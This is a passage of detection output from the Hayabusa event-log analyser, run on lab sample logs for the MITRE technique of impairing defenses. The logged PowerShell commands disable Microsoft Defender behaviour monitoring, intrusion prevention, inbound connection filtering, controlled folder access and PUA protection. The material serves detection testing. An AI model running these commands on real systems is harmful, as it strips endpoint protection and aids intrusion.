value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:50.962 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:50.986 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:50.989 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:50.999 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:51.010 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableBehaviorMonitoring $true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:51.070 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:51.071 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:51.088 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:51.091 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:51.106 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:51.118 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableIntrusionPreventionSystem $true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:51.134 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:51.134 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:51.151 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:51.155 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:52.339 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:52.355 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableInboundConnectionFiltering $true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:52.423 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:52.423 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:52.430 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:34:52.432 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
2021-10-06 18:46:09.533 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -EnableControlledFolderAccess Disabled"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x242c | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx
2021-10-06 18:46:13.168 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -PUAProtection disable"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x21f4 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx
2021-10-06 18:46:28.683 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1bcc | User: WIN10-02$ | LID: 
